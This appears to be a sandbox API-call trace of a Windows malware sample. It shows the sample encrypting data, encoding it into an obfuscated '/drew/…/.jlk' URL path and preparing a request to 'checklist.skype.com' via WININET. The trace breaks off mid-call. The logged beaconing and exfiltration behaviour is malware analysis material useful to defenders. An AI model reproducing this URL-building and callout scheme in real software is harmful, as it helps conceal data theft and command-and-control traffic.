[0316.843] GetProcAddress (hModule=0x76390000, lpProcName="CryptImportKey") returned 0x763ae5e0 [0316.843] CryptImportKey (in: hProv=0x6440a8, pbData=0x8bf760*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x8bf798 | out: phKey=0x8bf798*=0x642690) returned 1 [0316.847] GetProcAddress (hModule=0x76390000, lpProcName="CryptSetKeyParam") returned 0x763c30a0 [0316.847] CryptSetKeyParam (hKey=0x642690, dwParam=0x1, pbData=0x8bf77c, dwFlags=0x0) returned 1 [0316.851] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0xd0) returned 0x2e698c0 [0316.851] memcpy (in: _Dst=0x2e698c0, _Src=0x2e697e8, _Size=0x10 | out: _Dst=0x2e698c0) returned 0x2e698c0 [0316.851] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2f60 [0316.851] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e698c0*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e698c0*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e698d0, _Src=0x2e697f8, _Size=0x10 | out: _Dst=0x2e698d0) returned 0x2e698d0 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e698d0*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e698d0*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e698e0, _Src=0x2e69808, _Size=0x10 | out: _Dst=0x2e698e0) returned 0x2e698e0 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e698e0*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e698e0*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e698f0, _Src=0x2e69818, _Size=0x10 | out: _Dst=0x2e698f0) returned 0x2e698f0 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e698f0*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e698f0*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e69900, _Src=0x2e69828, _Size=0x10 | out: _Dst=0x2e69900) returned 0x2e69900 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69900*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69900*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e69910, _Src=0x2e69838, _Size=0x10 | out: _Dst=0x2e69910) returned 0x2e69910 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69910*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69910*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e69920, _Src=0x2e69848, _Size=0x10 | out: _Dst=0x2e69920) returned 0x2e69920 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69920*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69920*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e69930, _Src=0x2e69858, _Size=0x10 | out: _Dst=0x2e69930) returned 0x2e69930 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69930*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69930*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e69940, _Src=0x2e69868, _Size=0x10 | out: _Dst=0x2e69940) returned 0x2e69940 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69940*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69940*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e69950, _Src=0x2e69878, _Size=0x10 | out: _Dst=0x2e69950) returned 0x2e69950 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69950*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69950*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.853] memcpy (in: _Dst=0x2e69960, _Src=0x2e69888, _Size=0x10 | out: _Dst=0x2e69960) returned 0x2e69960 [0316.853] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69960*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69960*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.854] memcpy (in: _Dst=0x2e69970, _Src=0x2e69898, _Size=0x10 | out: _Dst=0x2e69970) returned 0x2e69970 [0316.854] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e69970*, pdwDataLen=0x8bf79c*=0x10, dwBufLen=0x20 | out: pbData=0x2e69970*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.854] memcpy (in: _Dst=0x2e69980, _Src=0x2e698a8, _Size=0xf | out: _Dst=0x2e69980) returned 0x2e69980 [0316.854] CryptEncrypt (in: hKey=0x642690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e69980*, pdwDataLen=0x8bf79c*=0xf, dwBufLen=0x20 | out: pbData=0x2e69980*, pdwDataLen=0x8bf79c*=0x10) returned 1 [0316.854] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyKey") returned 0x763ae890 [0316.854] CryptDestroyKey (hKey=0x642690) returned 1 [0316.854] GetProcAddress (hModule=0x76390000, lpProcName="CryptReleaseContext") returned 0x763ae9b0 [0316.854] CryptReleaseContext (hProv=0x6440a8, dwFlags=0x0) returned 1 [0316.854] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1a0) returned 0x2e69998 [0316.855] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e698c0 | out: hHeap=0x2a70000) returned 1 [0316.855] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e697e8 | out: hHeap=0x2a70000) returned 1 [0316.856] StrTrimA (in: psz="7N8FVl1l9AJ8t/XBBGv5f0p0hYnEyD7LtDMqfQBAkw71EWHGOg1f/ZGE4xmjwnl4llEGW028NXmwEgg6Afg8cyIjILbYy2z2ICg3MYRNmbf+UM6/HZOlkU/qHbyqXU43zAHt1ebYa2T3axhV99ZTfwCLpaPZo4N5CLbVZhMQAnof9zlC1S3pa5mcWIcVRkpIMleDPsPl/mjyX/ZpC90fqrcYZetISswNAQybG2gf5fF+Ass7PTFanx0Eota8Pwqb9uV2dw85xrtZds5GUbaTIb==", pszTrimChars="\r\n=" | out: psz="7N8FVl1l9AJ8t/XBBGv5f0p0hYnEyD7LtDMqfQBAkw71EWHGOg1f/ZGE4xmjwnl4llEGW028NXmwEgg6Afg8cyIjILbYy2z2ICg3MYRNmbf+UM6/HZOlkU/qHbyqXU43zAHt1ebYa2T3axhV99ZTfwCLpaPZo4N5CLbVZhMQAnof9zlC1S3pa5mcWIcVRkpIMleDPsPl/mjyX/ZpC90fqrcYZetISswNAQybG2gf5fF+Ass7PTFanx0Eota8Pwqb9uV2dw85xrtZds5GUbaTIb") returned 1 [0316.856] lstrlenA (lpString="7N8FVl1l9AJ8t/XBBGv5f0p0hYnEyD7LtDMqfQBAkw71EWHGOg1f/ZGE4xmjwnl4llEGW028NXmwEgg6Afg8cyIjILbYy2z2ICg3MYRNmbf+UM6/HZOlkU/qHbyqXU43zAHt1ebYa2T3axhV99ZTfwCLpaPZo4N5CLbVZhMQAnof9zlC1S3pa5mcWIcVRkpIMleDPsPl/mjyX/ZpC90fqrcYZetISswNAQybG2gf5fF+Ass7PTFanx0Eota8Pwqb9uV2dw85xrtZds5GUbaTIb") returned 278 [0316.856] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x343) returned 0x2e6b420 [0316.856] _snprintf (in: _Dest=0x2e6b42d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0316.856] _snprintf (in: _Dest=0x2e6b456, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0316.856] _snprintf (in: _Dest=0x2e6b48f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0316.856] _snprintf (in: _Dest=0x2e6b495, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0316.856] _snprintf (in: _Dest=0x2e6b49e, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0316.856] _snprintf (in: _Dest=0x2e6b4f2, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0316.856] _snprintf (in: _Dest=0x2e6b4f9, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0316.856] _snprintf (in: _Dest=0x2e6b519, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0316.856] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69998 | out: hHeap=0x2a70000) returned 1 [0316.857] lstrlenA (lpString="7N8FVl1l9AJ8t_2FXBBGv5f0p0hYnEyD7LtDMqfQBAkw71EWHGOg1f_2FZGE4xmjwnl4llEGW028NXmwEgg6Afg8cyIjILbYy2z2ICg3MYRNmbf_2BUM6_2FHZOlkU_2FqHbyqXU43zAHt1ebYa2T3axhV99ZTfwCLpaPZo4N5CLbVZhMQAnof9zlC1S3pa5mcWIcVRkpIMleDPsPl_2FmjyX_2FZpC90fqrcYZetISswNAQybG2gf5fF_2BAss7PTFanx0Eota8Pwqb9uV2dw85xrtZds5GUbaTIb") returned 294 [0316.857] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x14b) returned 0x2e697e8 [0316.857] memcpy (in: _Dst=0x2e697e8, _Src=0x2e6b420, _Size=0xe | out: _Dst=0x2e697e8) returned 0x2e697e8 [0316.857] memcpy (in: _Dst=0x2e697f7, _Src=0x2e6b42e, _Size=0x15 | out: _Dst=0x2e697f7) returned 0x2e697f7 [0316.857] memcpy (in: _Dst=0x2e6980d, _Src=0x2e6b443, _Size=0x10 | out: _Dst=0x2e6980d) returned 0x2e6980d [0316.857] memcpy (in: _Dst=0x2e6981e, _Src=0x2e6b453, _Size=0xf | out: _Dst=0x2e6981e) returned 0x2e6981e [0316.857] memcpy (in: _Dst=0x2e6982e, _Src=0x2e6b462, _Size=0x12 | out: _Dst=0x2e6982e) returned 0x2e6982e [0316.857] memcpy (in: _Dst=0x2e69841, _Src=0x2e6b474, _Size=0x9 | out: _Dst=0x2e69841) returned 0x2e69841 [0316.857] memcpy (in: _Dst=0x2e6984b, _Src=0x2e6b47d, _Size=0x14 | out: _Dst=0x2e6984b) returned 0x2e6984b [0316.857] memcpy (in: _Dst=0x2e69860, _Src=0x2e6b491, _Size=0x13 | out: _Dst=0x2e69860) returned 0x2e69860 [0316.857] memcpy (in: _Dst=0x2e69874, _Src=0x2e6b4a4, _Size=0x16 | out: _Dst=0x2e69874) returned 0x2e69874 [0316.857] memcpy (in: _Dst=0x2e6988b, _Src=0x2e6b4ba, _Size=0xd | out: _Dst=0x2e6988b) returned 0x2e6988b [0316.857] memcpy (in: _Dst=0x2e69899, _Src=0x2e6b4c7, _Size=0x8 | out: _Dst=0x2e69899) returned 0x2e69899 [0316.857] memcpy (in: _Dst=0x2e698a2, _Src=0x2e6b4cf, _Size=0x17 | out: _Dst=0x2e698a2) returned 0x2e698a2 [0316.857] memcpy (in: _Dst=0x2e698ba, _Src=0x2e6b4e6, _Size=0xa | out: _Dst=0x2e698ba) returned 0x2e698ba [0316.857] memcpy (in: _Dst=0x2e698c5, _Src=0x2e6b4f0, _Size=0x11 | out: _Dst=0x2e698c5) returned 0x2e698c5 [0316.857] memcpy (in: _Dst=0x2e698d7, _Src=0x2e6b501, _Size=0xc | out: _Dst=0x2e698d7) returned 0x2e698d7 [0316.857] memcpy (in: _Dst=0x2e698e4, _Src=0x2e6b50d, _Size=0xb | out: _Dst=0x2e698e4) returned 0x2e698e4 [0316.857] memcpy (in: _Dst=0x2e698f0, _Src=0x2e6b518, _Size=0xe | out: _Dst=0x2e698f0) returned 0x2e698f0 [0316.857] memcpy (in: _Dst=0x2e698ff, _Src=0x2e6b526, _Size=0x15 | out: _Dst=0x2e698ff) returned 0x2e698ff [0316.857] memcpy (in: _Dst=0x2e69915, _Src=0x2e6b53b, _Size=0x9 | out: _Dst=0x2e69915) returned 0x2e69915 [0316.857] memcpy (in: _Dst=0x2e6991f, _Src=0x2e6b544, _Size=0x3 | out: _Dst=0x2e6991f) returned 0x2e6991f [0316.858] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e6b420 | out: hHeap=0x2a70000) returned 1 [0316.858] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69d78 | out: hHeap=0x2a70000) returned 1 [0316.858] StrTrimA (in: psz="7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib", pszTrimChars="\r\n" | out: psz="7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib") returned 0 [0316.858] lstrlenA (lpString="/drew/") returned 6 [0316.858] lstrlenA (lpString="7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib") returned 313 [0316.858] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x140) returned 0x2e69940 [0316.858] lstrcpyA (in: lpString1=0x2e69940, lpString2="/drew/" | out: lpString1="/drew/") returned="/drew/" [0316.858] lstrcatA (in: lpString1="/drew/", lpString2="7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib" | out: lpString1="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib") returned="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib" [0316.858] lstrcpyA (in: lpString1=0x2e697e8, lpString2=".jlk" | out: lpString1=".jlk") returned=".jlk" [0316.858] lstrcpyA (in: lpString1=0x2e6ac18, lpString2="checklist.skype.com" | out: lpString1="checklist.skype.com") returned="checklist.skype.com" [0316.858] lstrcatA (in: lpString1="checklist.skype.com", lpString2="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib" | out: lpString1="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib") returned="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib" [0316.858] lstrcatA (in: lpString1="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib", lpString2=".jlk" | out: lpString1="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk") returned="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk" [0316.858] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2cc [0316.858] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2f8 [0316.858] lstrlenA (lpString="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk") returned 342 [0316.858] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x157) returned 0x2e6b420 [0316.859] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x157) returned 0x2e6b580 [0316.859] StrChrA (lpStart="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk", wMatch=0x2f) returned="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk" [0316.859] StrChrA (lpStart="checklist.skype.com/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk", wMatch=0x3f) returned 0x0 [0316.859] memcpy (in: _Dst=0x2e6b420, _Src=0x2e6ac18, _Size=0x13 | out: _Dst=0x2e6b420) returned 0x2e6b420 [0316.859] lstrcpyA (in: lpString1=0x2e6b580, lpString2="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk" | out: lpString1="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk") returned="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk" [0316.859] lstrlenA (lpString="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk") returned 323 [0316.859] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x287) returned 0x2e6b6e0 [0316.859] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x74220000 [0316.878] GetProcAddress (hModule=0x74220000, lpProcName="InternetCanonicalizeUrlA") returned 0x7459c8b0 [0316.880] InternetCanonicalizeUrlA (in: lpszUrl="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk", lpszBuffer=0x2e6b6e0, lpdwBufferLength=0x8bf768, dwFlags=0x0 | out: lpszBuffer="/drew/7N8FVl1l9AJ8t_/2FXBBGv5f0p0hYnEyD7Lt/DMqfQBAkw71EWHGO/g1f_2FZGE4xmjwn/l4llEGW028NXmwEgg6/Afg8cyIjI/LbYy2z2ICg3MYRNmbf_2/BUM6_2FHZOlkU_2FqHb/yqXU43zAHt1ebYa2T3axhV/99ZTfwCLpaPZo/4N5CLbVZ/hMQAnof9zlC1S3pa5mcWIcV/RkpIMleDPs/Pl_2FmjyX_2FZpC90/fqrcYZetISsw/NAQybG2gf5f/F_2BAss7PTFanx/0Eota8Pwqb9uV2dw85xrt/Zds5GUbaT/Ib.jlk", lpdwBufferLength=0x8bf768) returned 1 [0316.881] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e6b580 | out: hHeap=0x2a70000) returned 1 [0316.881] GetProcAddress (hModule=0x74220000, 